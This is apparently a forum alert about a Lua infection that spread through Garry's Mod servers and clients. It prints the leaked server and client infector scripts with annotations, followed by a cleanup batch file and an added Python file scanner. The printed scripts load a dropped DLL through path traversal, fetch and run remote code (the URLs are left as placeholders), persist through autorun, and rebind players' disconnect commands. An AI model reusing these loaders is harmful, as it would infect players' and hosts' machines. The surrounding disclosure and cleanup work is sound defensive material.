This is an alert to both server hosts and players.
Recently (2 days ago; shut up if I'm late), a Lua infection was going around, targeting both clients and servers/server hosts.
Some of our clients, and our server, recently got messed with by Chrisaster, or one of his buddies who go under the same name, or VIN. The files involved are client_infect.lua and server_infect.lua.
It seems they do this through client uploads.
Not 100% sure, but it seems they hack into RCON (they can get your RCON password through clientside Lua, even with client uploads disabled), put some files on there, then use some other fancy doodads to infect the server and clients further.
Some of their code leaked into our console, so here's what I found. Make what you want of it, and keep in mind that these scripts were made very recently; this is a new thing:
Here's server_infect.lua:
-- Loaded over HTTP by Lua through CompileString(...)() via rcon request
if not system.IsWindows() then
    return -- the dropped binaries are Windows-only, so bail on Linux servers
end
if file.Exists("lua/autorun/server/default.lua", "MOD") then
    return -- Already infected
end
-- Poll every 2 seconds until the DLL dropped by the earlier stage shows up in download/
timer.Create("infchk", 2, 0, function()
    if file.Exists("download/engine_win32.dll", "MOD") then
        timer.Remove("infchk")
        -- Path traversal out of the binary module folder so require() loads download/engine_win32.dll
        require("/../../../download/engine")
        -- CreateFile is presumably exported by that DLL; it is not a stock Garry's Mod Lua function
        http.Fetch("*ACTUAL LINK TO VIRUS CODE HERE", function(content)
            -- Persist the second stage as an autorun script so it survives a map change or restart
            CreateFile("garrysmod/lua/autorun/server/default.lua", content)
            include("autorun/server/default.lua")
        end, function() end)
    end
end)
Here's client_infect.lua:
-- Loaded over HTTP by Lua through client:SendLua(..)
if not system.IsWindows() then
    return -- Windows-only payload
end
if file.Exists("bin/game_shader_generic_engine.dll", "MOD") then
    return -- Already infected
end
-- Same 2-second poll for the dropped DLL as the server side
timer.Create("infchk", 2, 0, function()
    if file.Exists("download/engine_win32.dll", "MOD") then
        timer.Remove("infchk")
        -- Path traversal so require() loads download/engine_win32.dll as a binary module
        require("/../../../download/engine")
        -- CreateFile and GetShaderBinary are presumably exported by that DLL; neither is a stock GMod function
        http.Fetch("SAME HERE", function(content)
            -- Drop a second DLL into bin/ (also used above as the "already infected" marker)
            CreateFile("garrysmod/bin/game_shader_generic_engine.dll", GetShaderBinary())
            -- Stash the fetched Lua on disk disguised as a texture
            CreateFile("garrysmod/materials/cooltexture.vtf", content)
            -- Run the fetched Lua; pcall swallows any error so nothing shows in the console
            local ret = CompileString(content, "l", false)
            pcall(ret)
            -- 4 seconds later, rebind the commands a player would use to leave so they quit the game instead
            timer.Simple(4, function()
                ConCommand("alias disconnect quit\n")
                ConCommand("alias gamemenucommand quit\n")
                ConCommand("alias retry quit\n")
                ConCommand("alias connect quit\n")
                ConCommand("alias map quit\n")
            end)
        end, function() end)
    end
end)
Hey Garry, or Valve, maybe you can find some ways to fix this a bit?
Thanks, and VINH'LL FIX IT@@.
It's been fixed (yes, by Vinh), but just in case you have any suspicions about it, you should try this code in a batch file in your garrysmod folder, client or server. And if you ask "WHICH GARRY'S MOD FOLDER?", the one I'm talking about is the one with steam.inf (the file) in it.
@echo off
title Exploit file cleanup - MFSiNC
:: If run from the game root (where hl2.exe lives), step into garrysmod first
if exist "hl2.exe" (
    cd "garrysmod"
)
if not exist steam.inf (
    echo.
    echo You're running this from the wrong place!
    echo.
    echo Put this file in your garrysmod folder, either server or client, and re-run it.
    echo.
    echo.
    pause
    exit
)
echo.
echo This will remove the files used in the exploit/virus.
echo.
echo To see exactly what will be removed, open this batch file with Notepad.
echo.
pause
echo Cleaning..
:: Kill the game/server first so the DLLs are not locked; errors for processes that are not running are hidden
taskkill /F /IM hl2.exe >nul 2>&1
taskkill /F /IM srcds.exe >nul 2>&1
:: Files, clientside (attrib -h first in case they were dropped as hidden)
if exist "engine_win32.dll" (
    attrib -h "engine_win32.dll"
    del /F /Q "engine_win32.dll"
)
if exist "materials\cooltexture.vtf" (
    del /F /Q "materials\cooltexture.vtf"
)
if exist "bin\game_shader_generic_engine.dll" (
    attrib -h "bin\game_shader_generic_engine.dll"
    del /F /Q "bin\game_shader_generic_engine.dll"
)
if exist "download\engine_win32.dll" (
    attrib -h "download\engine_win32.dll"
    del /F /Q "download\engine_win32.dll"
)
:: Dir
if exist "download\cfg" (
    RD /S /Q "download\cfg"
)
:: Files, serverside
if exist "lua\autorun\server\default.lua" (
    attrib -h "lua\autorun\server\default.lua"
    del /F /Q "lua\autorun\server\default.lua"
)
echo.
echo Done.
echo.
pause
Paste that into Notepad, save it as a .bat file, and run it. You probably don't have it, but if things have been going weird lately, or you're a worried server host, try it.
Also, here's a video...of it?
https://www.youtube.com/watch?v=1lQEeX19YhQ
I don't know.
Either way, here's the Facepunch topic.
http://facepunch.com/showthread.php?t=1386818
QUICKEDIT: Oh, and after MORE research, this was not only spreading on Garry's Mod, but on other Source games as well. Also, ANYONE who has the file WILL be banned by a server with QAC. Bad stuff.
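Added example (my own code, not from the post above and not part of Vinh's fix): a Python scanner that checks a garrysmod folder for the same files the batch script deletes, but reports them and records SHA-256 hashes instead of removing them, so a server host can keep evidence before cleaning up. The file paths come from the batch script; the extra rule that any DLL under download/ is suspicious is my assumption, and the planted files in demo() are constructed test data.

```python
"""IOC scan for the engine_win32.dll / default.lua Lua infection (added example)."""
import hashlib
import tempfile
from pathlib import Path

# Paths named in the cleanup batch file, relative to the garrysmod folder that holds steam.inf.
IOC_PATHS = [
    "engine_win32.dll",
    "download/engine_win32.dll",
    "bin/game_shader_generic_engine.dll",
    "materials/cooltexture.vtf",
    "lua/autorun/server/default.lua",
    "download/cfg",  # directory
]

# Assumption of this example: download/ only ever receives server-pushed content
# (maps, materials, sounds), so a DLL of any name in there is worth flagging.
EXTRA_DLL_DIR = "download"


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large DLLs do not need to be read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root: Path) -> dict:
    """Return {"valid_root": bool, "findings": [(relative_path, kind, sha256_or_None), ...]}.

    kind is "file" or "dir" for a known IOC path, "unexpected-dll" for the download/ heuristic.
    Nothing is deleted or modified.
    """
    root = Path(root)
    if not (root / "steam.inf").is_file():  # same sanity check as the batch file
        return {"valid_root": False, "findings": []}
    findings = []
    seen = set()
    for rel in IOC_PATHS:
        p = root / rel
        if p.is_dir():
            findings.append((rel, "dir", None))
            seen.add(rel)
        elif p.is_file():
            findings.append((rel, "file", sha256_of(p)))
            seen.add(rel)
    dl = root / EXTRA_DLL_DIR
    if dl.is_dir():
        for p in sorted(dl.rglob("*.dll")):
            rel = p.relative_to(root).as_posix()
            if rel not in seen:
                findings.append((rel, "unexpected-dll", sha256_of(p)))
    return {"valid_root": True, "findings": findings}


def demo() -> dict:
    """Build a constructed garrysmod tree with planted indicators and scan it (test data only)."""
    infected = Path(tempfile.mkdtemp(prefix="gmod_ioc_"))
    (infected / "steam.inf").write_text("appID=4000\n")  # constructed marker file
    (infected / "download").mkdir()
    (infected / "download" / "engine_win32.dll").write_bytes(b"MZ constructed, not a real DLL")
    (infected / "download" / "gm_other.dll").write_bytes(b"MZ another planted file")
    (infected / "download" / "cfg").mkdir()
    (infected / "materials").mkdir()
    (infected / "materials" / "cooltexture.vtf").write_bytes(b"")  # empty file, known SHA-256
    # A bare directory without steam.inf must be rejected rather than scanned.
    not_a_root = Path(tempfile.mkdtemp(prefix="gmod_bad_"))
    return {"infected": scan(infected), "clean": scan(not_a_root)}


if __name__ == "__main__":
    result = demo()
    for rel, kind, digest in result["infected"]["findings"]:
        print(f"{kind:15} {rel:40} {digest or ''}")
```

Run it from the folder containing steam.inf by calling scan(Path(".")) instead of demo(); a non-empty findings list means the batch script above has something to clean, and the hashes can be kept for comparing with other affected servers.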